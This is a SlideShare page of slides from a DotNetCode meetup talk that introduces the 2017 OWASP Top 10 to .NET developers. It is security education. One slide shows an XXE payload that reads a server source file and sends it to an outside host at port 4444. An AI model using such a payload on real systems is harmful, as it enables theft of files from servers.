SlideShare a Scribd company logo

Meetup DotNetCode Owasp

dotnetcode
dotnetcode

Meetup DotNetCode Owasp

Technology
1 of 33
Download to read offline
DotNetCode.IT Microsoft .Net Coding Community www.dotnetcode.it MeetUp! #AperiTech
DotNetCode.IT Microsoft .Net Coding Community OWASP: Security for .NET Developers (scrivere codice sicuro o almeno provarci) Benvenuti DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community #AperiTech
DotNetCode.IT Microsoft .Net Coding Community 21 Aprile 2018 - Global Azure Bootcamp bit.ly/gabrome18
DotNetCode.IT Microsoft .Net Coding Community Speaker Software Architect Comdata Digital Fabio Mannis Email : fabio.mannis@outlook.com Linkedin : https://www.linkedin.com/in/fabiomannis/
DotNetCode.IT Microsoft .Net Coding Community AGENDA • Cosa è OWASP • Quali sono i top 10 punti da tenere presente per sviluppare applicazioni web «sicure» • Casi d'uso ed alcuni esempi su come scrivere codice sicuro (o almeno provarci!)
DotNetCode.IT Microsoft .Net Coding Community OWASP
DotNetCode.IT Microsoft .Net Coding Community • The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here. • There are hundreds of issues that could affect the overall security of a web application • The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls and also provides developers with a list of requirements for secure development.
DotNetCode.IT Microsoft .Net Coding Community OWASP Cheat Sheet Series
DotNetCode.IT Microsoft .Net Coding Community Application Security Verification Standard (ASVS)
DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection In an injection attack, instead of specifying data, the user is able to specify a command. This means that for applications which are vulnerable to injection attacks, hackers can in fact direct the system to perform an action which could lead to data exposure, loss of data integrity, and even data deletion.
DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection • Sql Injection • Ldap Injection • Command Injection
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Password • Minumum lenght >=10 (or passphrases) • Maximun lenght 128 • Password complexity • Hashing • Secure Password Recovery Mechanism • No cookieless session • TLS!!!
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Require re-authentication for Sensitive features (for mitigate CSRF or XSS attacks) • Authentication and Error Messages (generic manner) • Prevent Brute-Force Attacks • Built-in Session Management Implementations (Asp.net core identity) • Cookies • HttpOnly = true;
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Cookies • HttpOnly = true; • Default expiration (default : only current browser session valid) • Secure = true; • Domain
DotNetCode.IT Microsoft .Net Coding Community A3:2017- Sensitive Data Exposure Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser
DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % stolendata SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml"> <!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://192.168.1.10:4444/?%stolendata;'>">
DotNetCode.IT Microsoft .Net Coding Community A5:2017-Broken Access Control Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
DotNetCode.IT Microsoft .Net Coding Community A6:2017-Security Misconfiguration Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion.
DotNetCode.IT Microsoft .Net Coding Community A7:2017- Cross-Site Scripting (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
DotNetCode.IT Microsoft .Net Coding Community A8:2017- Insecure Deserialization Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
DotNetCode.IT Microsoft .Net Coding Community A9:2017-Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
DotNetCode.IT Microsoft .Net Coding Community A10:2017- Insufficient Logging & Monitoring Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community Prossimo Evento Leonardo D’Ottavi Data: 18/05/2018
DotNetCode.IT Microsoft .Net Coding Community Global Azure Bootcamp 2018 bit.ly/gabrome18
DotNetCode.IT Microsoft .Net Coding Community Selfie Lottery www.dotnetcode.it http://bit.ly/sldnc20180418
DotNetCode.IT Microsoft .Net Coding Community Grazie a Tutti! DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community Follow US! www.dotnetcode.it https://www.facebook.com/DotNetCode.IT https://twitter.com/DotNetCodeIT https://plus.google.com/+DotnetcodeIt

Recommended

Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssueIshan Girdhar
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
[OPD 2019] Inter-application vulnerabilities
[OPD 2019] Inter-application vulnerabilities[OPD 2019] Inter-application vulnerabilities
[OPD 2019] Inter-application vulnerabilitiesOWASP
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Cybersecurity Education and Research Centre
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveviewShreyas N
 

Recommended

Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssueIshan Girdhar
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
[OPD 2019] Inter-application vulnerabilities
[OPD 2019] Inter-application vulnerabilities[OPD 2019] Inter-application vulnerabilities
[OPD 2019] Inter-application vulnerabilitiesOWASP
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Cybersecurity Education and Research Centre
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveviewShreyas N
 
Owasp
Owasp Owasp
Owasp penetration Tester
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsTechWell
 
Benefits of Web Application Firewall
Benefits of Web Application FirewallBenefits of Web Application Firewall
Benefits of Web Application Firewalldavidjohnrace
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017Siddharth Phatarphod
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsAlexander Benoit
 
iOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesiOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesYair Amit
 
Zero Trust Networks
Zero Trust NetworksZero Trust Networks
Zero Trust NetworksPractical Code, LLC
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Sampath Bhargav Pinnam
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Prevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsImperva
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Prathan Phongthiproek
 
Untitled 1
Untitled 1Untitled 1
Untitled 1Sergey Kochergan
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...OWASP
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointIvanti
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10YasserElsnbary
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017ibrahimumer2
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 

More Related Content

What's hot

Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsTechWell
 
Benefits of Web Application Firewall
Benefits of Web Application FirewallBenefits of Web Application Firewall
Benefits of Web Application Firewalldavidjohnrace
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsAlexander Benoit
 
iOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesiOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesYair Amit
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Sampath Bhargav Pinnam
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Prevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsImperva
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Prathan Phongthiproek
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...OWASP
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointIvanti
 

What's hot (20)

Owasp
Owasp Owasp
Owasp
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
 
Benefits of Web Application Firewall
Benefits of Web Application FirewallBenefits of Web Application Firewall
Benefits of Web Application Firewall
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 
Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutions
 
iOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesiOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious Profiles
 
Zero Trust Networks
Zero Trust NetworksZero Trust Networks
Zero Trust Networks
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Prevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty Integri Datasheet
Prevoty Integri Datasheet
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
 
Web application security
Web application securityWeb application security
Web application security
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
 
Untitled 1
Untitled 1Untitled 1
Untitled 1
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
 
[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the Endpoint
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 

Similar to Meetup DotNetCode Owasp

A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners Checkmarx
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Wail Hassan
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present DangersPeter Wood
 
Jan 2008 Allup
Jan 2008 AllupJan 2008 Allup
Jan 2008 Allupllangit
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New VulnerabilitiesProtect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New VulnerabilitiesSymantec
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?Peter Wood
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecLalit Kale
 
Log Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesLog Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesKai Wähner
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEArun Voleti
 
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.IRJET Journal
 

Similar to Meetup DotNetCode Owasp (20)

A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
 
Jan 2008 Allup
Jan 2008 AllupJan 2008 Allup
Jan 2008 Allup
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New VulnerabilitiesProtect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
Log Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesLog Analytics for Distributed Microservices
Log Analytics for Distributed Microservices
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
 
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
 

More from dotnetcode

Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive ServicesAzure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Servicesdotnetcode
 
Azure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service PlanAzure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service Plandotnetcode
 
Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!dotnetcode
 
Azure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep DiveAzure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep Divedotnetcode
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOpsdotnetcode
 
Meetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web AppMeetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web Appdotnetcode
 
Meetup Progressive Web App
Meetup Progressive Web AppMeetup Progressive Web App
Meetup Progressive Web Appdotnetcode
 
Meetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e KubernetesMeetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e Kubernetesdotnetcode
 
How to create custom modules for Visual Studio
How to create custom modules for Visual StudioHow to create custom modules for Visual Studio
How to create custom modules for Visual Studiodotnetcode
 
Exploring VS Code
Exploring VS CodeExploring VS Code
Exploring VS Codedotnetcode
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOpsdotnetcode
 
Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker dotnetcode
 
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1dotnetcode
 
Meetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure FunctionsMeetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure Functionsdotnetcode
 
Meetup .NET & Micro ORM
Meetup .NET & Micro ORMMeetup .NET & Micro ORM
Meetup .NET & Micro ORMdotnetcode
 
Meetup ASP.NET Core Angular
Meetup ASP.NET Core AngularMeetup ASP.NET Core Angular
Meetup ASP.NET Core Angulardotnetcode
 
Webhooks Meetup
Webhooks MeetupWebhooks Meetup
Webhooks Meetupdotnetcode
 
Meetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency InjectionMeetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency Injectiondotnetcode
 
Presentazione DotNetSchool
Presentazione DotNetSchoolPresentazione DotNetSchool
Presentazione DotNetSchooldotnetcode
 

More from dotnetcode (19)

Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive ServicesAzure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
 
Azure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service PlanAzure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service Plan
 
Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!
 
Azure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep DiveAzure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep Dive
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOps
 
Meetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web AppMeetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web App
 
Meetup Progressive Web App
Meetup Progressive Web AppMeetup Progressive Web App
Meetup Progressive Web App
 
Meetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e KubernetesMeetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e Kubernetes
 
How to create custom modules for Visual Studio
How to create custom modules for Visual StudioHow to create custom modules for Visual Studio
How to create custom modules for Visual Studio
 
Exploring VS Code
Exploring VS CodeExploring VS Code
Exploring VS Code
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOps
 
Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker
 
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
 
Meetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure FunctionsMeetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure Functions
 
Meetup .NET & Micro ORM
Meetup .NET & Micro ORMMeetup .NET & Micro ORM
Meetup .NET & Micro ORM
 
Meetup ASP.NET Core Angular
Meetup ASP.NET Core AngularMeetup ASP.NET Core Angular
Meetup ASP.NET Core Angular
 
Webhooks Meetup
Webhooks MeetupWebhooks Meetup
Webhooks Meetup
 
Meetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency InjectionMeetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency Injection
 
Presentazione DotNetSchool
Presentazione DotNetSchoolPresentazione DotNetSchool
Presentazione DotNetSchool
 

Recently uploaded

Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
